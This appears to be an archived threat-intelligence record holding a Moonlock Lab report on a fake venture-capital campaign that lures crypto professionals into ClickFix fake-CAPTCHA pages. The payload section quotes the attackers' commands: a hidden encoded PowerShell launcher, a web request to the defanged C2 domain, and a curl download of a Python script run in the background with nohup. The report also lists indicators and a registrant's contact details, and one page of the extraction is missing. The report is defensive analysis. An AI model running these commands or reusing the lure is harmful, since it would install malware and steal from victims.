{ "id": "e1477e60-b4ae-4e19-ad0b-d07bf4abc9f3", "created_at": "2026-04-23T02:54:27.304759Z", "updated_at": "2026-04-25T02:18:49.520118Z", "deleted_at": null, "sha1_hash": "0633e2a0a8762adc0e2ef68dcc19d720a1701467", "title": "Fake VCs target crypto talent", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 10725566, "plain_text": "Fake VCs target crypto talent\r\nBy Moonlock Lab Team\r\nPublished: 2026-03-02 · Archived: 2026-04-23 02:38:38 UTC\r\nIn a new investigation, Moonlock Lab has been tracking a malware campaign targeting cryptocurrency and Web3\r\nprofessionals. The threat actors operate through fabricated venture capital identities, engage victims on LinkedIn with\r\ntailored job or partnership offers, and funnel them toward spoofed video conferencing links—fake Zoom and Google Meet\r\npages—that serve as the delivery mechanisms for malicious payloads.\r\nWhat makes this campaign noteworthy is the convergence of several trends in modern threat operations: advanced social\r\nengineering, cross-platform payload delivery, and the adoption of the ClickFix technique, a method that weaponizes user\r\ntrust by disguising malicious command execution as a routine browser verification step.\r\nMoonlock Lab presents its full investigation, along with practical recommendations to help people protect themselves from\r\nthe attack.\r\nKey findings\r\nHere’s a rundown of the full findings we’ll be discussing in this report:\r\nA coordinated malware campaign is targeting cryptocurrency professionals through LinkedIn social engineering, fake\r\nventure capital firms, and fraudulent video conferencing links. \r\nThe attack chain culminates in a ClickFix-style fake CAPTCHA page that tricks victims into executing clipboard-injected commands in their Terminal.\r\nThe campaign is cross-platform by design, delivering tailored payloads for both macOS and Windows.\r\nWHOIS data links the malicious infrastructure to a single registrant: Anatolli Bigdasch (Boston, Massachusetts), who\r\nis connected to the fictitious company SolidBit Capital. This is the same entity whose “co-founder,” Mykhailo\r\nHureiev, was reported by a victim on X (formerly Twitter) for conducting recruiter scam operations on LinkedIn.\r\nRelated macOS samples analyzed by Moonlock Lab reveal fully undetectable (FUD) Mach-O binaries that download\r\nnext-stage payloads for lateral infection.\r\nNewly registered infrastructure, including the domain lumax[.]capital, suggests that threat actors are actively building\r\nthe next iteration of their campaign with a fresh fake company identity.\r\nBehavioral and operational indicators are consistent with tactics previously attributed to DPRK-aligned threat actors\r\ntargeting the cryptocurrency sector, though definitive attribution remains open.\r\nThe campaign shares tactical and infrastructure overlaps with activity attributed by Mandiant to UNC1069, a\r\nfinancially motivated DPRK threat actor tracked since 2018, including near-identical fake Zoom domain naming\r\nconventions (zoom[.]us07-web[.]us vs. Mandiant’s zoom[.]uswe05[.]us), Calendly-to-fake-Zoom social engineering\r\nflows, and cross-platform ClickFix delivery.\r\nThe campaign begins on LinkedIn, where an operator using the persona Mykhailo Hureiev, listed as “Co-Founder \u0026\r\nManaging Partner” at SolidBit Capital, contacts targets with personalized messages. The approach follows a consistent\r\npattern:\r\n1. Flattery and context-setting. The initial message references the target’s public work, community engagement, or\r\nprofessional visibility. In a documented case, Hureiev wrote: “Recently I’ve been following [project name] and its\r\nRWA-focused ecosystem, and your work around KOL and community engagement has been quite visible.”\r\n2. Role framing. The operator presents SolidBit as a Web3 and DeFi-focused fund that works with “portfolio teams and\r\necosystem partners across growth, community, and narrative-building initiatives.”\r\n3. Urgency toward external links. The conversation quickly pivots to scheduling a call. The operator shares a\r\nCalendly link, calendly[.]com/hureivemykhail/with-solidbit-meeting, that is configured to redirect the victim to a\r\nfake Zoom meeting link.\r\nThis social engineering flow was publicly documented on January 9, 2026, by a user on X (handle @0xbigdan), who posted\r\na warning about the scam with screenshots of the full LinkedIn conversation. The victim noted several red flags: the use of\r\nlookalike domains, the urgency to follow external links, and a telling behavioral detail—when the victim invited Hureiev to\r\ntheir own Google Meet instead, the operator joined the call, stayed silent, and then disconnected. The account was blocked\r\nshortly after.\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 1 of 15\n\nInfrastructure: Domains, registrants, and fake companies\r\nThe infrastructure behind this campaign is well-structured and built to rotate identities when one front becomes exposed.\r\nMoonlock Lab has managed to trace how seemingly separate companies are connected and determine that one name sits at\r\nthe center of it all. \r\nDomain registration and the Bigdasch connection\r\nThis is where the OSINT gets interesting. We pulled WHOIS records for the malicious domains and found that they all point\r\nto the same registrant, shown below.\r\nField Value\r\nRegistrant Name Anatolli Bigdasch\r\nLocation Boston, MA, US\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 2 of 15\n\nPhone +1.3542438756\r\nEmail anatollibigdasch0717[at]gmail[.]com\r\nA search for “Anatolli Bigdasch” returns a private LinkedIn profile associated with the same individual. \r\nNotably, this profile identifies Bigdasch as the founder of SolidBit Capital, the same entity that Mykhailo Hureiev claims to\r\nrepresent when engaging victims on LinkedIn.\r\nWhether “Anatolli Bigdasch” is a real person, a stolen identity, or a fully fabricated persona cannot be conclusively\r\ndetermined from available data. What is clear is that this identity serves as the administrative anchor for the campaign’s\r\ndomain infrastructure.\r\nThe rotating company fronts: SolidBit, MegaBit, and Lumax Capital\r\nA defining characteristic of this campaign is the operators’ investment in fabricated company identities—not just single-purpose phishing pages but fully built-out corporate facades designed to stand up to the scrutiny of a victim’s due diligence\r\ncheck.\r\nSolidBit Capital is the identity tied to the Bigdasch registrant and the Mykhailo Hureiev LinkedIn persona. But SolidBit\r\nisn’t the only fake company in this operation.MegaBit is an additional fake company discovered on the campaign\r\ninfrastructure. Hosted on the fake Zoom domain at zoom[.]07usweb[.]us/homepage/, the site presents itself as an investment\r\nfirm with a polished dark-themed frontend, navigation tabs (Portfolio, About Us, Focus, Team, Contact Us, and Login), and\r\nan “Investment Team” page featuring four individuals, all displayed with AI-generated headshot photos. The domain variant\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 3 of 15\n\n(07usweb[.]us vs. us07-web[.]us) confirms that this is the same operator rotating infrastructure identifiers while reusing the\r\ncore naming pattern.\r\nThe name “MegaBit” itself follows the same convention as “SolidBit.” Both use the “-Bit” suffix commonly associated with\r\ncryptocurrency and blockchain ventures, suggesting a deliberate branding pattern designed to resonate with targets in the\r\ncrypto space.\r\nLumax Capital represents the newest iteration, as described below.\r\nVirusTotal pivoting: Lumax Capital\r\nPivoting through VirusTotal on the IP address associated with the known malicious domains revealed a newly registered\r\ndomain: lumax[.]capital, registered on February 2, 2026.\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 4 of 15\n\nAt the time of this analysis, the Lumax Capital website was live and fully functional. It included a polished frontend with\r\nworking navigation, multiple tabs, and a fabricated company history claiming operations since 2018 (contradicted by the\r\ndomain’s registration date of just days prior).\r\nThe “Leadership” page features AI-generated headshot photos of supposed team members—including “Anna Fernanda,”\r\n“Vladyslav Bystrov,” and others—with fabricated credentials from institutions like Stanford and MBA programs.\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 5 of 15\n\nThe site also includes a Research section with article entries backdated to December 2025. However, clicking any of these\r\nentries displays a “Coming soon” placeholder, confirming they are cosmetic stubs designed to build perceived legitimacy for\r\nvisitors who land on the site after an initial LinkedIn interaction.\r\nThis infrastructure strongly suggests that the threat actors are actively preparing Lumax Capital as the next front company in\r\ntheir campaign rotation, likely anticipating that the SolidBit Capital identities are compromised.\r\nThe ClickFix delivery mechanism\r\nThe ClickFix social engineering technique, sometimes referred to as “living-off-the-user,” has gained popularity among\r\nthreat actors throughout 2025–2026. Unlike traditional drive-by downloads or exploit kits, ClickFix attacks require the\r\nvictim to manually execute the malicious payload themselves, thus bypassing security tools.\r\nThe technique typically presents the victim with a fake browser verification (Cloudflare CAPTCHA, a “Verify you are\r\nhuman” prompt, etc.) that secretly copies a malicious command to the clipboard and then provides step-by-step visual\r\ninstructions for the user to paste and execute it in their system terminal.\r\nImplementation in this campaign\r\nWhen a victim clicks the fake Zoom or Google Meet link provided by the LinkedIn operator, they are directed to a page that\r\nappears to be a legitimate event website—in this case, “The Digital Asset Conference III,” referencing a real\r\ncryptocurrency event, and “Hedgeweek,” a well-established hedge fund industry news portal widely read by institutional\r\ninvestors, fund managers, and allocators. Moonlock Lab reached out to Hedgeweek to notify them of the typosquat domain\r\nabusing their brand, but did not receive a response at the time of publication.\r\nThe attackers overlay this page with a fake Cloudflare-branded verification modal.\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 6 of 15\n\nThe attack flow proceeds as follows.\r\nStep 1: Fake CAPTCHA. The page displays a familiar “I’m not a robot” checkbox with Cloudflare branding. This isn’t a\r\nreal Cloudflare challenge, however. There are no cf-chl-* tokens and no legitimate JavaScript challenge. In fact, the entire\r\ninterface is locally rendered HTML/CSS.\r\nStep 2: Clipboard poisoning. The moment the user clicks the checkbox, the page’s JavaScript silently writes a malicious\r\ncommand to the user’s clipboard using navigator.clipboard.writeText(). The command is OS-specific. The script detects the\r\noperating system via the User-Agent string and selects the appropriate payload.\r\nStep 3: Guided terminal execution. After the checkbox animation completes, the page transitions to a second modal, styled\r\nto match either Windows 11 or macOS aesthetics, that instructs the user to open their terminal and paste the clipboard\r\ncontents. This modal includes:\r\nA countdown timer to create artificial urgency\r\nAnimated step-by-step cursor demonstrations to show exactly how to open the terminal, right-click to paste, and\r\npress Enter\r\nA confirmation checkbox (“Perform the steps above to finish verification”) to provide psychological reinforcement—\r\nthe user affirms they have completed the steps, normalizing the action\r\nA “Verify” button that, once clicked, redirects to the real conference website (thedigitalassetconference.com),\r\ncreating the illusion that the verification was legitimate\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 7 of 15\n\nThe sophistication of these social engineering tactics is worth emphasizing. The attackers have invested in realistic OS-specific UI elements, cursor animations, and psychological pressure mechanics. The user genuinely believes they are\r\ncompleting a security verification to access a conference page, when they are, in fact, executing a remote payload loader on\r\ntheir own machine.\r\nPayload analysis\r\nPayloads are adaptive and designed to deliver convincing phishing messages tailored to users’ systems. By separating\r\ndelivery logic for Windows and macOS, threat actors ensure an interface that appears native to the victim’s environment,\r\nreducing friction and suspicion.\r\nWindows payload\r\nWhen the victim’s system is detected as Windows, the clipboard receives a PowerShell command:\r\npowershell -w h -nop -eC \u003cbase64\u003e\r\nThe flags are significant: -w h hides the PowerShell window, -nop bypasses execution policies, and -eC executes a Base64-\r\nencoded command. \r\nAfter decoding, the payload performs an in-memory web request:\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 8 of 15\n\n$x=New-Object -COM Microsoft.XMLHTTP\n\n$x.open('GET','https://hedgeweeks[.]online/ft?id=',$false)\n\nStage 3: Payload download. Using curl with a macOS-specific User-Agent header (“User-Agent: macintosh”), the script\r\ndownloads a Python file from the same C2 domain:\r\ncurl -H \"User-Agent: macintosh\" \"https://hedgeweeks[.]online/ft?id=\u003cencoded_id\u003e\" \u003e /tmp/hduwhv.py\r\nStage 4: Execution and persistence. The downloaded Python script is executed with python3 /tmp/hduwhv.py, piped into\r\nnohup bash \u0026 to ensure that it continues running even if the terminal window is closed.\r\nMoonlock Lab’s analysis extends beyond the ClickFix delivery vector to examine related macOS binaries associated with\r\nthe broader campaign. This work builds on an initial discovery by @malwrhunterteam and @L0Psec, who identified\r\nmalware masquerading as a Zoom client.\r\nA fake Zoom app\r\nThe original sample (SHA-256: 755cc133ae0519accbcfdd5f8f0d9fe1aa08cbcb306c3e5f29ebcb6ac12d9323), first shared by\r\n@malwrhunterteam and analyzed by @L0Psec, is a macOS application written in Swift that impersonates Zoom. Here’s\r\nhow it works.\r\nCredential harvesting via SwiftUI. Unlike less sophisticated infostealers that rely on osascript dialogs, this sample uses\r\nSwiftUI APIs to present a convincingly secure password prompt—a SecureTextField within a native-looking dialog that\r\nclosely mimics a legitimate Zoom authentication request. The visual fidelity is advanced enough that even a cautious user\r\nmight not immediately distinguish it from a real system prompt. A small detail caught @L0Psec’s attention: The app even\r\nshakes the window when an incorrect password is entered, replicating standard macOS input error behavior.\r\nTelegram bot exfiltration. Captured credentials are exfiltrated to a Telegram bot.\r\nHosted multi-platform payload repository. The domain zoom[.]us05-web[.]us served as a payload hosting server, with\r\ndifferent files accessible via a numbered parameter: https://zoom[.]us05-web[.]us/ft?topic=s\u0026gt=\u003cnumber\u003e. Different\r\nnumbers returned different payloads. This design allows the operators to serve platform-specific or stage-specific files from\r\na single endpoint. Files retrieved from this URL included:\r\nAdditional macOS applications (ZIP archives)\r\nA Python script \r\nAn ELF binary \r\nA VBScript file \r\nThe presence of macOS apps, a Python script, an ELF binary, and a VBScript file all served from the same infrastructure\r\nunderscores a key characteristic of this campaign: It is cross-platform by design, with ready-made tooling for macOS,\r\nWindows, and Linux environments.\r\nFully undetectable (FUD) next-stage payloads\r\nMoonlock Lab’s continued analysis on 2 additional Mach-O binaries linked to this exact campaign after they were shared by\r\n@malwrhunterteam as related to fake Zoom domains.\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 10 of 15\n\nProperty Obfuscated version Non-obfuscated version\r\nSHA-256\r\n9a778d2b7919717e95072e4dec01c815a5fd81f574b538107652d73d8dc874b6 2fbd34eed9dbf57a44cf1540941fb43a793be27e13\r\nFile size 9.3 MB 37.6 KB\r\nBoth samples perform the same core functions: retrieving a temporary directory path, downloading files from a remote\r\nserver, re-signing them with ad-hoc code signatures, and executing them. The critical difference is in their construction.\r\nThe obfuscated version (9.3 MB) is inflated with garbage instructions distributed across 2 binary segments. This junk code\r\nis designed to thwart static analysis tools—disassemblers like Ghidra struggle to process the binary efficiently, making quick\r\ntriage impractical.\r\nThe non-obfuscated version (37.6 KB) contains the same functional logic without the padding. It appears to be either a\r\ndevelopment build or an earlier iteration of the payload.\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 11 of 15\n\nWhy both versions were uploaded to VirusTotal remains unclear. Both achieved zero detections across all vendors for an\r\nextended period after submission, demonstrating that the threat actors have invested in evasion techniques that effectively\r\nbypass current static analysis heuristics.\r\nThoughts on attribution: The UNC1069/DPRK connection\r\nOn February 9, 2026, Mandiant published detailed findings on an intrusion attributed to UNC1069, a financially motivated\r\nthreat actor with a suspected DPRK nexus, tracked since 2018. The intrusion targeted a FinTech entity in the cryptocurrency\r\nsector and involved the deployment of 7 malware families, including the known DPRK-associated downloader\r\nSUGARLOADER and 6 newly identified families: WAVESHAPER, HYPERCALL, HIDDENCALL, SILENCELIFT,\r\nDEEPBREATH, and CHROMEPUSH.\r\nThe operational parallels with the campaign documented in this article are striking.\r\nElement This campaign Mandiant’s UNC1069 case\r\nFake Zoom domain zoom[.]us07-web[.]us zoom[.]uswe05[.]us\r\nDomain naming\r\npattern\r\nzoom.us{XX}-web.us zoom.uswe{XX}.us\r\nSocial engineering\r\nflow\r\nLinkedIn → Calendly → fake\r\nZoom\r\nTelegram (compromised account) →\r\nCalendly → fake Zoom\r\nDelivery technique\r\nClickFix (fake Cloudflare\r\nCAPTCHA)\r\nClickFix (fake audio troubleshooting)\r\nOS targeting macOS + Windows  macOS + Windows \r\nTarget sector Crypto/Web3 professionals Crypto startups, software developers\r\nFake company\r\nfronts\r\nSolidBit Capital, MegaBit,\r\nLumax Capital\r\nCompromised executive identity\r\nDifferences in ClickFix implementation\r\nWhile both campaigns use the ClickFix technique, the social engineering wrapper differs. In the campaign documented here,\r\nthe attackers use a fake Cloudflare CAPTCHA overlaid on a spoofed conference page, with animated terminal instructions\r\nguiding the user to paste clipboard-injected commands. In Mandiant’s case, the fake Zoom call presented a deepfake video\r\nof a known CEO and used a simulated “audio issue” to justify the victim running “troubleshooting” commands.\r\nThe Mandiant case is arguably more sophisticated in its ClickFix framing. The troubleshooting commands include\r\nlegitimate system profiler calls (system_profiler SPAudioData, pnputil /enum-devices) alongside the malicious payload\r\ndownload, making the overall command block appear more plausible to a technically literate victim.\r\nThe campaign we analyzed relies more heavily on the trust established by the Cloudflare brand and the familiarity of the\r\nCAPTCHA interaction. Both approaches, however, share the same core mechanic: tricking the user into pasting and\r\nexecuting attacker-controlled commands in their own terminal.\r\nRecommendations\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 12 of 15\n\nAs is often the case with social engineering, a few minutes spent on verification can prevent serious damage. When\r\ncontacted on LinkedIn about job opportunities, partnerships, or investment discussions from unfamiliar accounts, slow the\r\ninteraction down and take your time to verify everything.\r\nHere are the steps you should take to stay safe:\r\nVerify the company. Check when the domain was registered, review the company’s digital footprint, and look\r\nclosely at team photos or biographies that may be AI-generated or recently fabricated.\r\nBe cautious if a conversation quickly moves off of LinkedIn. If the sender insists on using their Zoom, Calendly,\r\nor Google Meet, run those external links through a URL checking tool.\r\nTreat urgency as a red flag. Pressure to schedule quickly, move to private channels, or follow specific technical\r\ninstructions to change settings on your device is often a key part of the manipulation.\r\nNever paste commands into your terminal. No legitimate service will require you to open your terminal and run a\r\ncommand as part of a verification process.\r\nThe rule of thumb is to pause before doing anything you don’t fully understand. If a step feels unusual for a job interview, a\r\npartnership call, or an investment discussion, it probably is.\r\nConclusion\r\nA threat actor has built what amounts to an entire corporate ecosystem that doesn’t exist, including fake companies (SolidBit\r\nCapital, MegaBit, Lumax Capital), fake teams (including AI-generated headshots and bios), fabricated company histories,\r\nfunctional websites, LinkedIn personas that send thoughtful, personalized messages, Calendly links that feel routine, and\r\nZoom domains that seem legitimate at a quick glance.\r\nEvery layer is designed to survive additional scrutiny. And for many victims, that’s all it takes.\r\nThe ClickFix technique is what makes the final step so effective. By turning the victim into the execution mechanism—\r\nhaving them paste and run the command themselves—the attackers sidestep the very controls the security industry has spent\r\nyears building. No exploit. No suspicious download. Just a human doing what a website told them to do, because every\r\nsignal up to that point seems to indicate that it was safe.\r\nAt Moonlock Lab, tracking campaigns like this is at the core of what we do. Our focus on macOS threats means we often\r\ncatch things early. This research, for example, started with a single sample and expanded into a full campaign map.\r\nBut research alone doesn’t protect your Mac. That’s why our findings feed directly into the Moonlock app — real-time\r\nprotection built by the same team that tracks these threats. Moonlock’s malware database is updated with detections for\r\nemerging threats like the ones documented in this article. \r\nWe’ll keep watching this one. The domains will change. The company names will change. But the playbook has been\r\nwritten, and that makes it harder to hide.\r\nIf you believe you have been targeted by this campaign, if you’ve been contacted by someone from similar fake companies\r\nlike SolidBit Capital, MegaBit, or Lumax Capital, or if you’ve encountered a “verification” page that asked you to open\r\nyour terminal, share your experience with the Moonlock team on X or via email. Help us burn this infrastructure down\r\nfaster than the attackers can rebuild it.\r\nIndicators of compromise (IOCs)\r\nNetwork indicators\r\nType Value Context\r\nDomain zoom[.]us07-web[.]us Fake Zoom page, hosts ClickFix payload\r\nDomain zoom[.]07usweb[.]us\r\nFake Zoom page, hosts MegaBit fake\r\ncompany site\r\nDomain zoom[.]us05-web[.]us\r\nFake Zoom page, multi-platform payload\r\nserver\r\nDomain goog1e[.]us-meet[.]com Fake Google Meet page\r\nDomain hedgeweeks[.]online\r\nC2 server; typosquat of Hedgeweek\r\n(hedgeweek.com)\r\nDomain lumax[.]capital\r\nNew campaign infrastructure (registered\r\n2026-02-02)\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 13 of 15\n\nURL\r\ncalendly[.]com/hureivemykhail/with-solidbit-meeting\r\nCalendly link used in social engineering\r\nFile indicators\r\nSHA-256 Description\r\n755cc133ae0519accbcfdd5f8f0d9fe1aa08cbcb306c3e5f29ebcb6ac12d9323\r\nFake Zoom macOS\r\napplication\r\n9a778d2b7919717e95072e4dec01c815a5fd81f574b538107652d73d8dc874b6\r\nObfuscated Mach-O\r\nnext-stage loader (9.3\r\nMB)\r\n2fbd34eed9dbf57a44cf1540941fb43a793be27e13e937299167b2b67cb84d6b\r\nNon-obfuscated Mach-O\r\nnext-stage loader (37.6\r\nKB)\r\nRegistrant information\r\nField Value\r\nName Anatolli Bigdasch\r\nLocation Boston, MA, US\r\nEmail anatollibigdasch0717[at]gmail[.]com\r\nPhone +1.3542438756\r\nPersona Platform Role claimed\r\nMykhailo Hureiev LinkedIn Co-Founder \u0026 Managing Partner, SolidBit Capital\r\nAnatolli Bigdasch LinkedIn Founder SolidBit Capital\r\nRelated UNC1069 infrastructure (from Mandiant)\r\nThe following indicators were published by Mandiant in their UNC1069 report and are included here for cross-reference, as\r\nthey share operational patterns with the infrastructure documented in this article:\r\nType Value Context\r\nDomain zoom[.]uswe05[.]us\r\nFake Zoom meeting (note naming pattern similarity to zoom[.]us07-\r\nweb[.]us)\r\nDomain mylingocoin[.]com Hosted initial payload\r\nDomain breakdream[.]com SUGARLOADER C2\r\nDomain dreamdie[.]com SUGARLOADER C2\r\nDomain support-zoom[.]us SILENCELIFT C2\r\nDomain supportzm[.]com HYPERCALL C2\r\nDomain zmsupport[.]com HYPERCALL C2\r\nDomain cmailer[.]pro CHROMEPUSH upload server\r\nThis is an independent publication, and it has not been authorized, sponsored, or otherwise approved by Apple Inc.\r\nMicrosoft Windows is a trademark of Microsoft Corporation. Mac and macOS are trademarks of Apple Inc.\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 14 of 15\n\nMoonlock Lab Team\r\nMoonlock Lab is a team of malware researchers and reverse engineers, whose expertise is at the core of Moonlock's\r\ncybersecurity products. Moonlock is the cybersecurity division of MacPaw.\r\nSource: https://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign" ], "report_names": [ "fake-vcs-target-crypto-talent-clickfix-campaign" ], "threat_actors": [ { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-25T02:00:03.362702Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "dcbff54d-13ec-40b5-b3b9-b74a315669e1", "created_at": "2026-02-03T02:00:03.428641Z", "updated_at": "2026-04-25T02:00:03.739279Z", "deleted_at": null, "main_name": "UNC1069", "aliases": [ "MASAN", "CryptoCore" ], "source_name": "MISPGALAXY:UNC1069", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1776912867, "ts_updated_at": 1777083529, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0633e2a0a8762adc0e2ef68dcc19d720a1701467.pdf", "text": "https://archive.orkl.eu/0633e2a0a8762adc0e2ef68dcc19d720a1701467.txt", "img": "https://archive.orkl.eu/0633e2a0a8762adc0e2ef68dcc19d720a1701467.jpg" } }